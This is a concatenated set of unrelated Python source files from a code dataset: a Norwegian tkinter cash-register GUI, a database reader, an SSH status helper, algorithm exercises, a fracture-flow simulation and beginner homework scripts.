command=self.rodFunk, background=\"#EB4521\", borderwidth=borderWidth)\n self.endre_antallButton = tkinter.Button(self.funcFrame, textvariable=self.gronnStringvar, width=2, command=self.gjorIngenting, background=\"green\", borderwidth=borderWidth)\n self.sok_artikkelButton = tkinter.Button(self.funcFrame, textvariable=self.gulStringvar, width=2, command=self.gulFunk, background=\"#EEF422\", borderwidth=borderWidth)\n self.prisforesporselButton = tkinter.Button(self.funcFrame, textvariable=self.blaStringvar, width=2, command=self.gjorIngenting, background=\"#00BFF3\", borderwidth=borderWidth)\n self.fjern_artikkelButton = tkinter.Button(self.funcFrame, textvariable=self.orangeStringvar, width=2, command=self.gjorIngenting, background=\"orange\", borderwidth=borderWidth)\n self.lojalitetButton = tkinter.Button(self.funcFrame, textvariable=self.lillaStringvar, width=2, command=self.gjorIngenting, background=\"#B135D0\", borderwidth=borderWidth)\n self.velikeholdButton = tkinter.Button(self.funcFrame, textvariable=self.hvitStringvar, width=2, command=self.hvitFunk, background=\"#ffffff\", borderwidth=borderWidth)\n\n\n #Placement\n self.funksjonButton.grid(column=0, row=0, ipadx=x_padding, ipady=y_padding, pady=y_margin, padx=x_margin)\n self.endre_antallButton.grid(column=0, row=1, ipadx=x_padding, ipady=y_padding, pady=y_margin, padx=x_margin)\n self.sok_artikkelButton.grid(column=0, row=2, ipadx=x_padding, ipady=y_padding, pady=y_margin, padx=x_margin)\n self.prisforesporselButton.grid(column=0, row=3, ipadx=x_padding, ipady=y_padding, pady=y_margin, padx=x_margin)\n self.fjern_artikkelButton.grid(column=0, row=4, ipadx=x_padding, ipady=y_padding, pady=y_margin, padx=x_margin)\n self.lojalitetButton.grid(column=0, row=5, ipadx=x_padding, ipady=y_padding, pady=y_margin, padx=x_margin)\n self.velikeholdButton.grid(column=0, row=7, ipadx=x_padding, ipady=y_padding, pady=y_margin, padx=x_margin)\n \n\n def numfelt(self):\n x_margin = 5\n y_margin = 5\n x_padding = 20\n y_padding = 10\n\n tupple_y_margin = (10, 100)\n tupple_x_margin = (50, 10)\n\n rectangle_padding = 35\n\n self.numFrame = tkinter.Frame(self.keysFrame)\n self.numFrame.grid(column=0, row=0)\n\n self.actionFrame = tkinter.Frame(self.keysFrame)\n self.actionFrame.grid(column=1, row=0)\n\n self.laasButton = tkinter.Button(self.numFrame, text=\"Lås\", width=2, command=self.gjorIngenting)\n self.tilbakeButton = tkinter.Button(self.numFrame, text=\"Tilbake\", width=2, command=self.gjorIngenting)\n self.slettButton = tkinter.Button(self.numFrame, text=\"Slett\", width=2, command=self.slett)\n self.angreButton = tkinter.Button(self.numFrame, text=\"Angre\", width=2, command=self.gjorIngenting)\n\n self.numenButton = tkinter.Button(self.numFrame, text=\"1\", width=2, command=lambda: self.numpad(\"1\"), background=\"#222\", fg=\"#fff\")\n self.numtoButton = tkinter.Button(self.numFrame, text=\"2\", width=2, command=lambda: self.numpad(\"2\"), background=\"#222\", fg=\"#fff\")\n self.numtreButton = tkinter.Button(self.numFrame, text=\"3\", width=2, command=lambda: self.numpad(\"3\"), background=\"#222\", fg=\"#fff\")\n\n self.numfireButton = tkinter.Button(self.numFrame, text=\"4\", width=2, command=lambda: self.numpad(\"4\"), background=\"#222\", fg=\"#fff\")\n self.numfemButton = tkinter.Button(self.numFrame, text=\"5\", width=2, command=lambda: self.numpad(\"5\"), background=\"#222\", fg=\"#fff\")\n self.numseksButton = tkinter.Button(self.numFrame, text=\"6\", width=2, command=lambda: self.numpad(\"6\"), background=\"#222\", 
fg=\"#fff\")\n\n self.numsyvButton = tkinter.Button(self.numFrame, text=\"7\", width=2, command=lambda: self.numpad(\"7\"), background=\"#222\", fg=\"#fff\")\n self.numotteButton = tkinter.Button(self.numFrame, text=\"8\", width=2, command=lambda: self.numpad(\"8\"), background=\"#222\", fg=\"#fff\")\n self.numniButton = tkinter.Button(self.numFrame, text=\"9\", width=2, command=lambda: self.numpad(\"9\"), background=\"#222\", fg=\"#fff\")\n \n self.numnullButton = tkinter.Button(self.numFrame, text=\"0\", width=2, command=lambda: self.numpad(\"0\"), background=\"#222\", fg=\"#fff\")\n self.numnull_nullButton = tkinter.Button(self.numFrame, text=\"00\", width=2, command=lambda: self.numpad(\"00\"), background=\"#222\", fg=\"#fff\")\n self.numkommaButton = tkinter.Button(self.numFrame, text=\".\", width=2, command=lambda: self.numpad(\".\"), background=\"#222\", fg=\"#fff\")\n\n self.sumButton = tkinter.Button(self.actionFrame, text=\"Sum\", width=2, command=self.sumFunk)\n self.enterButton = tkinter.Button(self.actionFrame, text=\"Enter\", width=2, command=self.enterFunk)\n\n #Placement\n \n self.laasButton.grid(column=0, row=0, ipadx=x_padding+25, ipady=y_padding, padx=tupple_y_margin, pady=y_margin)\n self.tilbakeButton.grid(column=0, row=1, ipadx=x_padding+25, ipady=y_padding, padx=tupple_y_margin, pady=y_margin)\n self.slettButton.grid(column=0, row=2, ipadx=x_padding+25, ipady=y_padding, padx=tupple_y_margin, pady=y_margin)\n self.angreButton.grid(column=0, row=3, ipadx=x_padding+25, ipady=y_padding, padx=tupple_y_margin, pady=y_margin)\n row = 0\n self.numenButton.grid(column=1, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n self.numtoButton.grid(column=2, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n self.numtreButton.grid(column=3, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n row += 1\n self.numfireButton.grid(column=1, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n self.numfemButton.grid(column=2, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n self.numseksButton.grid(column=3, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n row += 1\n self.numsyvButton.grid(column=1, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n self.numotteButton.grid(column=2, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n self.numniButton.grid(column=3, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n row += 1\n self.numnullButton.grid(column=1, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n self.numnull_nullButton.grid(column=2, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n\n self.numkommaButton.grid(column=3, row=row, ipadx=20, ipady=10, padx=5, pady=5)\n self.sumButton.grid(column=4, row=0, columnspan=1, ipadx=rectangle_padding, ipady=rectangle_padding, padx=tupple_x_margin, pady=y_margin)\n self.enterButton.grid(column=4, row=2, columnspan=1, ipadx=rectangle_padding, ipady=rectangle_padding, padx=tupple_x_margin, pady=y_margin)\n\n\n def footer(self):\n self.labelTime = tkinter.Label(self.footerFrame, text=\"Dette er en test\")\n self.exitButton = tkinter.Button(self.footerFrame, text=\"Exit fullscreen\", command=self.exitFullscreen)\n\n self.scrollUP_button = tkinter.Button(self.footerFrame, text=\"UP\", command=self.scrollUP).grid(column=2, row=0)\n \n self.openPCI_Button = tkinter.Button(self.footerFrame, text=\"Kort\", command=self.openPCI_Func)\n\n #Position\n self.labelTime.grid(column=0, row=0)\n self.exitButton.grid(column=1, row=0)\n self.openPCI_Button(column=2, row=0)\n\n # Functions\n def exitFullscreen(self):\n #self.hovedvindu.attributes('-fullscreen', False) # FULLSCREEN OFF\n 
self.hovedvindu.destroy()\n\n def numpad(self, num):\n self.entry.insert(tkinter.END, num)\n\n def enterKEY_Funk(self, hendelse):\n self.enterFunk()\n\n def enterFunk(self):\n artikel = self.entry.get()\n self.entry.delete(0, tkinter.END)\n print(artikel)\n\n artikel = db.searchInRecords_kassen(artikel)\n print(f\"artikel: {artikel}\")\n print(type(artikel[4]))\n if artikel:\n itemTuple = (artikel[1], artikel[3], f\"{artikel[4]}kr\")\n self.artiklerIKurv.append(artikel[4])\n self.display_treeview.insert(\"\", \"end\", value=itemTuple)\n self.treeListe = self.display_treeview.get_children()\n self.treeListLen = len(self.treeListe)\n if self.treeListLen > 1:\n textTil_antallArtikler_stringvar = \"artikler\"\n else:\n textTil_antallArtikler_stringvar = \"artikel\"\n self.antallArtikler_stringvar.set(f\"{self.treeListLen} {textTil_antallArtikler_stringvar}\")\n\n\n def slett(self):\n self.entry.delete(0, tkinter.END)\n\n def gjorIngenting(self): # Denne skal slettes\n print(\"Jeg gjør ingenting enda!\")\n\n def rodFunk(self):\n if self.state == 0:\n self.state = 1 # Funksjoner\n else:\n self.state = 0 # Tilbake til start\n\n\n self.endreFunksjonsKnapp()\n\n def gulFunk(self):\n if self.state == 1:\n self.state = 3\n\n self.endreFunksjonsKnapp()\n\n def hvitFunk(self):\n if self.state == 0:\n self.state = 2 # Betalinger\n\n self.endreFunksjonsKnapp()\n\n def endreFunksjonsKnapp(self):\n self.rodStringvar.set(\"F1\\n\" + rodListe[self.state])\n self.gronnStringvar.set(\"F2\\n\" + gronnListe[self.state])\n self.gulStringvar.set(\"F3\\n\" + gulListe[self.state])\n self.blaStringvar.set(\"F4\\n\" + blaListe[self.state])\n self.orangeStringvar.set(\"F5\\n\" + orangeListe[self.state])\n self.lillaStringvar.set(\"F6\\n\" + lillaListe[self.state])\n self.hvitStringvar.set(\"F7\\n\" + hvitListe[self.state])\n\n def sumFunk(self):\n price = 0\n for item in self.artiklerIKurv:\n price += item\n self.sumStringvar.set(f\"Sum {round(price)},-\")\n\n def selectFromTree_func1(self):\n #print(len(self.display_treeview.selection()))\n try:\n self.treeviewID = self.display_treeview.get_children()[self.treeviewID]\n self.display_treeview.focus(self.treeviewID)\n self.display_treeview.selection_set(self.treeviewID)\n print(self.treeviewID)\n self.treeviewID = 1\n self.treeviewID = self.display_treeview.get_children()[self.treeviewID]\n self.display_treeview.focus(self.treeviewID)\n self.display_treeview.selection_set(self.treeviewID)\n print(self.treeviewID)\n self.treeviewID = 0\n self.treeviewID = self.display_treeview.get_children()[self.treeviewID]\n self.display_treeview.focus(self.treeviewID)\n self.display_treeview.selection_set(\"I010\")\n print(self.treeviewID)\n except IndexError:\n pass\n\n\n\n def selectFromTree_func(self, hendelse):\n try:\n row_id = self.display_treeview.selection()[0]\n selection = self.display_treeview.set(row_id)\n # --> Selection = [\"artikelNR\", \"Artikel\", \"Pris\"]\n for item in selection:\n print(item)\n except IndexError:\n pass\n\n def scrollUP(self):\n self.treeListe\n self.currentScollPOS += 1\n try:\n row_id = 'I001' #self.display_treeview.selection()[self.currentScollPOS]\n self.display_treeview.set(row_id)\n except IndexError:\n pass\n\n #Representasjon av elementene i forhold til hvordan skrolling fungerer\n #('I001', 'I002', 'I003', 'I004', 'I005', 'I006', 'I007', 'I008', 'I009', 'I00A', 'I00B', 'I00C', 'I00D', 'I00E', 'I00F', 'I010', 'I011', 'I012', 'I013', 'I014', 'I015', 'I016', 'I017', 'I018', 'I019', 'I01A', 'I01B', 'I01C', 'I01D', 'I01E')\n\n\n \n\n 
#print(self.treeviewID)\n #self.display_treeview.selection_set(self.treeviewID)\n #self.display_treeview.selection_set(\"I010\")\n\n def openPCI_Func(self):\n kortbetaling\n\n\nclass Login: #INGEN LOGIKK MED BRUKENAVN OG PASSORD SKAL LAGE DATABASE!!!!!\n def __init__(self):\n self.frame = tkinter.Tk()\n\n self.title_label = tkinter.Label(self.frame, text=\"Login\").grid(column=0, row=0, columnspan=2)\n\n self.username_label = tkinter.Label(self.frame, text=\"Username: \").grid(column=0, row=1)\n self.password_label = tkinter.Label(self.frame, text=\"Password: \").grid(column=0, row=2)\n self.username = tkinter.Entry(self.frame).grid(column=1, row=1)\n self.password = tkinter.Entry(self.frame, show=\"*\").grid(column=1, row=2)\n self.button = tkinter.Button(self.frame, text=\"Login\", command=self.loginFunc).grid(column=0, row=3, columnspan=2)\n\n\n #EVENTS\n self.frame.bind('', self.loginFunc)\n\n tkinter.mainloop()\n\n\n\n\n def loginFunc(self, hendelse=0):\n self.frame.destroy()\n GuiKasse(1)\n \n\n\n\nif __name__ == \"__main__\":\n #guiKasse = GuiKasse()\n #Login()\n GuiKasse(1)\n","sub_path":"guiDatabase.py","file_name":"guiDatabase.py","file_ext":"py","file_size_in_byte":19095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"238082328","text":"# datatasks\\sources\\DatabaseSource.py\nimport os\nfrom collections import OrderedDict\n\nfrom datatasks.db.DatabaseFactory import DatabaseFactory\nfrom datatasks.utils import convert_to_primary_datatypes\n\nfrom .DataSource import DataSource\n\n\nclass DatabaseSource(DataSource):\n \"\"\"\n Inherits RecordList and is capable of reading records in from a database.\n Capable of being managed by DataEntityManager. The filepath_str parameter\n is the file object for a text file containing a sql query.\n \"\"\"\n\n def __init__(self, name, db_name, filepath, **kwargs):\n self._db = DatabaseFactory().get_db(db_name)\n super().__init__(name, **kwargs)\n self.filepath = filepath\n\n def read_in(self):\n \"\"\"Reads records in from the database using the provide sql query.\"\"\"\n if self.loaded:\n return\n\n try:\n with open(self.filepath, 'r') as sql_file:\n sql_query_str = sql_file.read()\n except:\n raise FileNotFoundError('cannot read from query file')\n self.loaded = True\n for record in self._db.get_query_records(sql_query_str):\n self.load(record)\n","sub_path":"datatasks/sources/DatabaseSource.py","file_name":"DatabaseSource.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"45532453","text":"import paramiko\nimport os\n\ndef server_status():\n free_m=excute_orders(\"192.168.35.111\",\"free\")\n return free_m\n\n\n#执行命令 输入指令和ip,返回结果\ndef excute_orders(ip,cmd):\n\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip, 22, \"esunny\", \"123456\")\n stdin ,stdout, stderr = ssh.exec_command(cmd)\n if(stderr.read() != None):\n return stdout.read()\n ssh.close()\n return 0\n\n## 获取文件输入ip 源地址 目的地址\ndef get_file(ip,scr,des):\n if(os.path.exists(\"./192\") == False):\n os.mkdir(\"./192/\")\n t = paramiko.Transport((\"192.168.35.111\",22))\n t.connect(username=\"esunny\", password=\"123456\")\n sftp = paramiko.SFTPClient.from_transport(t)\n src = \"/home/esunny/esunny.tap\"\n des = \"192/esunny\"\n sftp.get(src,des)\n t.close()\n os._exit(0)\n return 
0\n\n\n\n\n\n","sub_path":"cmdb/servers_status.py","file_name":"servers_status.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"417253131","text":"import itertools\n\ndef solve():\n\tminimum_distance = float('Inf')\n\tminimum_route = ''\n\troutes = itertools.permutations(range(2,len(Nodes)+1))\n\tfor route in routes:\n\t\tdistance = Nodes[1][route[0]] + sum(Nodes[route[i-1]][route[i]] for i in range(1, len(route)))\n\n\t\tif distance < minimum_distance:\n\t\t\tminimum_distance = distance\n\t\t\tminimum_route = route\n\n\treturn minimum_distance, minimum_route\n\n\ndef main(nodes):\n\tglobal Nodes\n\tNodes = nodes\n\n\td,r = solve()\n\tprint(d)\n\tprint(r)\n","sub_path":"Algorithms/tspBrute.py","file_name":"tspBrute.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"635753693","text":"listofval=[]\nendGame=False\n\ndef end(value, list):\n    if value=='':\n        return True\n    else:\n        list.append(value)\n        return False\n    \nwhile endGame!=True:\n    number=input(\"Please enter a number\")\n    if end(number, listofval)==True:\n        endGame=True\n    else:\n        endGame=False\nprint(listofval)\n\nfor x in range(0,len(listofval)):\n    print(\"x=\", x)\n    for y in range(x+1,len(listofval)):\n        if int(listofval[x])>int(listofval[y]):\n            z=listofval[x]\n            listofval[x]=listofval[y]\n            listofval[y]=z\n    print(listofval)\n    \n\n\n","sub_path":"BubbleSortNumberSorter.py","file_name":"BubbleSortNumberSorter.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"308632191","text":"# рассчитывается давление в трещине по модели PKN с заданным давлением на скважине ( в центре трещины) и с миним. 
напряжением на кончике трещины.\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nif __name__ == '__main__':\n    l_fr0 = 0.1\n    hx = 0.005\n    t_step = 1\n    N_fr = int(l_fr0/hx)\n    nu = 0.2\n    H = 0.07\n    E = 3*10**9\n    G = E/2/(1+nu)\n    k = 4*(1-nu)*H/3.14/G\n    mu = 0.1\n    perm = 2*10**(-15)\n    alpha = 1/12/mu/k\n    Pinj = 50*10**5\n    Sh = 5*10**5\n    Pres = 1*10**5\n    w0 = k*(Pinj - Sh) # 2*10**(-4)\n    #coef = -perm/mu*(Pinj/2-Pres)/hy/2\n    #q = np.ones((N_fr-1, 1))*coef\n    q = np.zeros((N_fr-1, 1))\n\n    T_exp = 100\n    w = np.ones((N_fr - 1, 1))*k*(Sh - Sh)\n\ndef Pressure_in_frac(N_fr, t_step, alpha, w0, q, w, k, Sh):\n\n    A = np.zeros((N_fr - 1, N_fr - 1))\n    B = np.zeros((N_fr - 1, 1))\n    for n in range(1, N_fr-2):\n        w_right3 = ((w[n+1]+w[n])/2)**3\n        w_left3 = ((w[n]+w[n-1])/2)**3\n        A[n][n] = 1/t_step + alpha/hx*(w_right3/hx + w_left3/hx)\n        A[n][n-1] = -alpha/hx*w_left3/hx\n        A[n][n+1] = -alpha/hx*w_right3/hx\n\n    w_right3_0 = ((w[0 + 1] + w[0]) / 2) ** 3\n    w_left3_0 = ((w[0] + w0) / 2) ** 3\n    A[0][0] = 1/t_step + alpha/hx*(w_right3_0/hx + w_left3_0/hx)\n    A[0][1] = -alpha/hx*w_right3_0/hx\n\n    w_right3_end = ((0 + w[N_fr-2]) / 2) ** 3\n    w_left3_end = ((w[N_fr-2] + w[N_fr - 3]) / 2) ** 3\n    A[N_fr-2][N_fr-2] = 1/t_step + alpha/hx*(w_right3_end/hx + w_left3_end/hx)\n    A[N_fr-2][N_fr-3] = -alpha/hx*w_left3_end/hx\n\n    for n in range(0, N_fr-1):\n        B[n] = 1/t_step*w[n] - q[n]\n\n    w_left3_another = ((w[0] + w0) / 2) ** 3\n    B[0] = B[0] - (-alpha/hx*w_left3_another/hx)*w0\n\n    w_new = np.linalg.solve(A,B)\n\n    w = w_new.reshape(N_fr-1, 1)\n    P_new = w / k + Sh\n\n    return P_new, w\n\n\n\nif __name__ == '__main__':\n\n    for t in range(T_exp):\n        P_new, w_new = Pressure_in_frac(N_fr, t_step, alpha, w0, q, w, k, Sh)\n        w = w_new\n\n    print(P_new)\n    print(w_new)\n    fig = plt.figure()\n    surf = plt.plot(P_new)\n    plt.show()\n\n\n","sub_path":"flow_in_frac_simple_case.py","file_name":"flow_in_frac_simple_case.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"113730272","text":"import fileinput\n\nfrom BoatNavigatorWaypoint import BoatNavigatorWaypoint\n\n\ndef process(input_list: list) -> int:\n    \"\"\"\n    Calculate the final manhattan distance after all instructions have been followed.\n\n    :param input_list:\n    :return: manhattan distance\n    \"\"\"\n    bn = BoatNavigatorWaypoint(input_list)\n    bn.sail_away()\n    print(bn.location)\n    total = sum([val for val in bn.location.values() if val > 0])\n    return total\n\n\nif __name__ == '__main__':\n    lines = [i.strip('\\n') for i in fileinput.input()]\n    print(lines[0:10])\n    output = process(lines)\n    print(f'Output: {output}')\n","sub_path":"src/12_2_boat_navigator_waypoint.py","file_name":"12_2_boat_navigator_waypoint.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"619076347","text":"# Given n non-negative integers a1, a2, ..., an ,\n# where each represents a point at coordinate (i, ai).\n# n vertical lines are drawn such that the two endpoints of line i is at (i, ai) and (i, 0).\n# Find two lines, which together with x-axis forms a container, such that the container contains the most water.\n#\n# Note: You may not slant the container and n is at least 2.\n\nfrom typing import List\n\n\nclass Solution:\n    def max_area(self, height: List[int]) -> int:\n\n        if len(height) == 2:\n            return min(height)\n\n        if len(height) == 3:\n            return max(min(height[0], height[1]), min(height[1], height[2]), min(height[0], height[2]) * 2)\n\n        else:\n            left = 0\n            right = len(height) - 1\n\n            max_water = 
0\n\n while left < right:\n max_water = max(max_water, min(height[left], height[right]) * (right - left))\n\n if height[left] < height[right]:\n left += + 1\n else:\n right -= 1\n\n return max_water\n","sub_path":"medium/ContainerWithMostWater.py","file_name":"ContainerWithMostWater.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"411843320","text":"# -*- coding: UTF-8 -*-\r\n\"\"\"\r\nViewModel板块,用于View和Model之间数据交互\r\n\"\"\"\r\nfrom my_model import Cache, Settings\r\n\r\n\r\nclass ViewModel:\r\n \"\"\" ViewModel \"\"\"\r\n _cache_map = {}\r\n _cache = None\r\n _setting = None\r\n _ModelMap = {\"SCREEN_SIZE_LIST\": \"screen_size_list\",\r\n \"CONF_IMAGE_DICT\": \"conf_image_dict\",\r\n \"LOGON_SSH_DICT\": \"logon_ssh_dict\",\r\n \"SUBLOGIN_INDEX_LIST\": \"sublogin_index_list\",\r\n \"GET_INFOWIN_EVT_FLAG\": \"get_infowin_flag\",\r\n \"SET_INFOWIN_EVT_FLAG\": \"set_infowin_flag\",\r\n \"TREE_VIEW_DATA_LIST\": \"treeview_data_list\",\r\n \"PAGE_WIDGETS_DICT\": \"page_widgets_dict\",\r\n \"SERVER_CACHE_DICT\": \"server_cache_dict\",\r\n \"REFRESH_TIMER_DICT\": \"refresh_timer_dict\"}\r\n\r\n @classmethod\r\n def init(cls, settingmap):\r\n cls._cache = Cache()\r\n cls._setting = Settings()\r\n return cls._setting.init(settingmap)\r\n\r\n @classmethod\r\n def cache(cls, message, type=None, data=None):\r\n \"\"\"\r\n 数据操作;\r\n 根据消息字串映射成具体的model函数名\r\n \"\"\"\r\n if message not in cls._ModelMap:\r\n return None\r\n func_str = \"cls._cache.%s\" % cls._ModelMap[message]\r\n func = eval(func_str)\r\n\r\n if type == 'ADD':\r\n if isinstance(func, list):\r\n func.append(data)\r\n elif isinstance(func, dict):\r\n func.update(data)\r\n elif type == 'SUB':\r\n try:\r\n if isinstance(func, list):\r\n func.remove(data)\r\n elif isinstance(func, dict):\r\n func.pop(data)\r\n except:\r\n pass\r\n elif type == 'QUE':\r\n return func\r\n elif type == 'DEL':\r\n func.clear()\r\n else:\r\n return func(data)\r\n\r\n","sub_path":"my_viewmodel.py","file_name":"my_viewmodel.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"484313250","text":"st_1 = \"Spring!\"\nst_2 = '25_T_warm'\n\nin_1 = 5\nin_2 = 0\nin_3 = -10\nin_4 = 30\n\nfl_1 = 5.25\nfl_2 = -0.75\nfl_3 = 10.5\n\nn_l = [st_1,st_2,in_1,in_2,in_3,in_4,fl_1,fl_2,fl_3]\nfor i in n_l:\n print('Param =', i, ' --', type(i))\n\n\na = [in_2,in_3,in_4]\nfor i in a:\n print('Result =', in_1 > i)\n\nfor i in a:\n print('Result =', in_1 < i)\n\nfor i in a:\n print('Result =', in_1 >= i)\n\nfor i in a:\n print('Result =', in_1 <= i)\n\nfor i in a:\n print('Result =', in_1 != i)\n\n\nb = [fl_2,fl_3]\nfor i in b:\n print('Result =', fl_1 > i)\n\nfor i in b:\n print('Result =', fl_1 < i)\n\nfor i in b:\n print('Result =', fl_1 >= i)\n\nfor i in b:\n print('Result =', fl_1 <= i)\n\nfor i in b:\n print('Result =', fl_1 != i)\n\n\n\nresult_1 = in_1 == 5 and in_2 >= 0\nresult_2 = in_1 >= 5 and in_3 != -10\nresult_3 = in_4 > 15 and in_3 <= -10\nresult_4 = in_1 > 15 or in_3 <= -15\nresult_5 = in_4 < 1 or in_2 == 0\nresult_6 = in_4 != 15 or in_1 >=25\nresult_7 = not in_1 == 15\nresult_8 = not in_4 < 30 and in_2 == 0\nresult_9 = not in_1 != 5 and in_3 > 0\nresult_10 = not in_1 == 5 or not in_3 <= 10\n\nr_l =[result_1,result_2,result_3,result_4,result_5,result_6,result_7,result_8,result_9,result_10]\nfor i in r_l:\n print('result =', i)\n\n\n\nprint('Введите число:')\na = int(input())\n\nif 
a < 30:\n print('Вы ввели число =', a, ',', 'которое меньше 30')\nelif a > 30:\n print('Вы ввели число =', a, ',', 'которое больше 30')\nelse:\n print('Вы ввели число =', a, ',', 'которое равно 30')\n\n\n\nprint('Введите число:')\nb = int(input())\n\nimport random\nn = random.randint(1, 100)\n\nif b == n:\n print('Вы ввели число =', b, ',', 'которое равно сгенерированному числу')\nelif b > n:\n print('Вы ввели число =', b, ',', 'которое больше сгенерированного числа')\nelse:\n print('Вы ввели число =', b, ',', 'которое меньше сгенерированного числа')\n\nprint('Сгенерированное число =', n)\n\n\n\nprint('Введите число:')\nx = int(input())\n\nimport random\ny_1 = random.randint(1, 100)\ny_2 = random.randint(1, 100)\n\nif y_1 < y_2:\n if x < y_1:\n print('Вы ввели число =', x, ',', 'которое меньше сгенерированных чисел y_1 и y_2')\n elif x > y_1 and x < y_2:\n print('Вы ввели число =', x, ',', 'которое больше сгенерированного числа y_1 и меньше сгенерированного числа y_2')\n elif x == y_1:\n print('Вы ввели число =', x, ',', 'которое равно сгенерированному числу y_1 и меньше сгенерированного числа y_2')\n elif x == y_2:\n print('Вы ввели число =', x, ',', 'которое больше сгенерированного числа y_1 и равно сгенерированному числу y_2')\n else:\n print('Вы ввели число =', x, ',', 'которое больше сгенерированных чисел y_1 и y_2')\nelif y_1 > y_2:\n if x < y_2:\n print('Вы ввели число =', x, ',', 'которое меньше сгенерированных чисел y_1 и y_2')\n elif x < y_1 and x > y_2:\n print('Вы ввели число =', x, ',', 'которое меньше сгенерированного числа y_1 и больше сгенерированного числа y_2')\n elif x == y_2:\n print('Вы ввели число =', x, ',', 'которое меньше сгенерированного числа y_1 и равно сгенерированному числу y_2')\n elif x == y_1:\n print('Вы ввели число =', x, ',', 'которое равно сгенерированному числу y_1 и больше сгенерированного числа y_2')\n else:\n print('Вы ввели число =', x, ',', 'которое больше сгенерированных чисел y_1 и y_2')\n\nelse:\n print('Вы ввели число =', x, ',', 'которое равно сгенерированным числам y_1 и y_2')\n\nprint('Сгенерированное число y_1 =', y_1)\nprint('Сгенерированное число y_2 =', y_2)","sub_path":"Python_Home_2.py","file_name":"Python_Home_2.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"179483310","text":"N = [\"1st\", \"2nd\", \"3rd\"] # 先建立字串的list等等拿來print出來\nL1 = [[0 for j in range(5)] for i in range(3)] # 列表解析裡面還有列表解析,初始值都給0\nfor i in range(3):\n print(\"The {} student:\".format(N[i]))\n for j in range(5):\n L1[i][j] = int(input()) # 有list跟處使值以後,就可以不用花費心思來建立list,可以直接輸入分數來改裡面的元素\n\nfor i in range(3):\n print(\"Student %d\" % (i + 1))\n print(\"#Sum %d\" % (sum(L1[i])))\n print(\"#Average %.2f\" % (sum(L1[i]) / 5))","sub_path":"_6_list/607/reference_solution.py","file_name":"reference_solution.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"66943810","text":"import numpy as np\nimport cv2\nimport sys, os\nimport copy\nfrom utils.contour import ensure_3D_contour, to_2D_contour\n\n\nclass Filter:\n def __init__(self):\n self.conf_section = None\n self.conf_file = None\n self.icon = None\n\n def meta(self):\n return {\n \"filter\": self.conf_section,\n \"name\": \"Origin Contour\",\n \"description\": \"Moves the contour to the center point [0,0]\",\n \"parameters\": [],\n \"input\": \"contour\",\n \"output\": \"contour\",\n \"icon\": self.icon\n }\n\n def 
configure(self, global_conf, conf_section, conf_file):\n self.conf_section = conf_section\n self.conf_file = conf_file\n\n def process(self, image, cnt_3d):\n if len(cnt_3d) > 0:\n cnt = to_2D_contour(cnt_3d)\n # Determine the bounding rectangle of all contours\n x, y, w, h = cv2.boundingRect(np.concatenate(cnt))\n image_height, image_width = image.shape[0], image.shape[1]\n\n # the offset to move the center of the contour to [0,0]\n offset_x = int(w / 2 + x)\n offset_y = int(h / 2 + y)\n\n cnt_3d = [np.subtract(c, [offset_x, offset_y, 0], dtype=np.int32) for c in cnt_3d]\n\n # shift the contour to the center. Only required for the drawing\n #\n w2 = int(image_width / 2)-offset_x\n h2 = int(image_height / 2)-offset_y\n drawing_cnt = [np.subtract(c, [-w2, -h2], dtype=np.int32) for c in cnt]\n newimage = np.zeros(image.shape, dtype=\"uint8\")\n newimage.fill(255)\n\n # draw the coordinate system of the centered drawing contour\n x, y, w, h = cv2.boundingRect(np.concatenate(drawing_cnt))\n cv2.drawContours(newimage, drawing_cnt, -1, (60, 169, 242), 1)\n # horizontal\n cv2.line(newimage, (x + int(w / 2), y + int(h / 2)), (x + w, y + int(h / 2)), (255, 0, 0), 1)\n # vertical\n cv2.line(newimage, (x + int(w / 2), y), (x + int(w / 2), y + int(h / 2)), (0, 0, 255), 1)\n\n image = newimage\n\n return image, cnt_3d\n\n def stop(self):\n pass\n","sub_path":"src/processing/contours/origin.py","file_name":"origin.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"236995042","text":"def printAverage(scores):\n print(\"The average test score is %d\"%(sum(scores)/len(scores)))\n\n\n# returns a list of scores entered by the user\ndef enterScores(numStudents):\n return [int(raw_input(\"Enter their score: \")) for i in range(numStudents)]\n\n\nfrom enterScores import enterScores\nfrom printAverage import printAverage\n\ndef main():\n while (True):\n 